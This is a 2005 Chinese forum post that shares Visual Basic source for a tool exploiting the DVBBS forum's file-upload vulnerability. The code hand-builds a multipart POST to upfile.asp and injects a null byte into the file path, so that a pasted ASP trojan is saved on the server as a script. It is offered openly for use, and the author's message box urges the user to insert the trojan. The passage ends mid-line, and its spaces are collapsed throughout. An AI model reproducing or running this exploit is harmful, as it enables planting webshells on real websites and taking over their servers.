[原创]DVBBS文件上传漏洞利用工具原代码
文章标题:[
原创]DVBBS文件上传漏洞利用工具原代码顶部 白色猎人 发布于:2005-02-2112:13 [楼主][原创]DVBBS文件上传漏洞利用工具原代码
文章作者:白色猎人qq233536605
信息来源:邪恶八进制信息安全团队
这个是动网文件上传漏洞刚出来时候写的,代码很简单。刚才在这个版块中也看到个文件上传漏洞利用工具的原代码。他那个运用到了api函数,我这个没有用api函数的,比较适合VB初学者,哈哈。不过你要想成为个编程高手的话,还是需要多
学习点api函数的。
OptionExplicit
Diminfo1AsString
Diminfo2AsString
DimlengthAsInteger
PrivateSubCommand1_Click()
IfMe.Height=5010Then
Me.Height=7635
EndIf
IfText5.Text=""Then
MsgBox"看你急的,连ASP木马也没放进去。还不快放个进去!",vbExclamation+vbOKOnly,"友情提示:)"
EndIf
info2="" &;#39;====================这里的变量如果不清空的话,后面测试数据长度的地方会出错=======================
Winsock1.Close
Winsock1.RemoteHost=Text1.Text
Winsock1.RemotePort=Text2.Text
Winsock1.Connect
EndSub
PrivateSubCommand2_Click()
End
EndSub
PrivateSubForm_Load()
Me.Height=5010
Me.Width=4410
Text1.Text="qfaq"
Text2.Text="80"
Text3.Text="/dvbbs/upfile.asp"
Text4.Text="uploadface/mm.asp"
Text5.Text=""
Text6.Text=""
Text7.Text="/dv
bbs/reg_upload.asp"
EndSub
PrivateSubWinsock1_Connect()
&;#39;===================info1和info2两个变量就是抓包抓到的2条记录==================
OnErrorResumeNext
info2=info2+"-----------------------------7d411939702a4"+vbCrLf
info2=info2+"Content-Disposition:form-data;name="+Chr(34)+"filepath"+Chr(34)+vbCrLf
info2=info2+vbCrLf
info2=info2+Text4.Text+Chr(0)+vbCrLf
info2=info2+"-----------------------------7d411939702a4"+vbCrLf
info2=info2+"Content-Disposition:form-data;name="+Chr(34)+"act"+Chr(34)+vbCrLf
info2=info2+vbCrLf
info2=info2+"upload"+vbCrLf
info2=info2+"-----------------------------7d411939702a4"+vbCrLf
&;#39;==================这里的chr(34)表示双引号=======================================
info2=info2+"Content-Disposition:form-data;name="+Chr(34)+"file1"+Chr(34)+";filename="+Chr(34)+"C:\bjsdfzlt.gif"+Chr(34)+vbCrLf
info2=info2+"Content-Type:text/plain"+vbCrLf
info2=info2+vbCrLf
info2=info2+Text5.Text+vbCrLf
info2=info2+vbCrLf
info2=info2+"-----------------------------7d411939702a4"+vbCrLf
info2=info2+"Content-Disposition:form-data;name="+Chr(34)+"fname"+Chr(34)+vbCrLf
&;#39;info2=info2+Text5.Text+vbCrLf
info2=info2+vbCrLf
info2=info2+"C:\bjsdfzlt.asp"+vbCrLf
info2=info2+"-----------------------------7d411939702a4"+vbCrLf
info2=info2+"Content-Disposition:form-data;name="+Chr(34)+"Submit"+Chr(34)+vbCrLf
info2=info2+vbCrLf
info2=info2+"上传"+vbCrLf
info2=info2+"-----------------------------7d411939702a4--"+vbCrLf
length=LenB(StrConv(info2,vbFromUnicode))&;#39;========
==========这里控制数据的长度====================
info1="POST"+""+Text3.Text+""+"HTTP/1.1"+vbCrLf
info1=info1+"Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*"+vbCrLf
info1=info1+"Referer:"+Text1.Text+Text7.Text+vbCrLf
info1=info1+"Accept-Language:zh-cn"+vbCrLf
info1=info1+"Co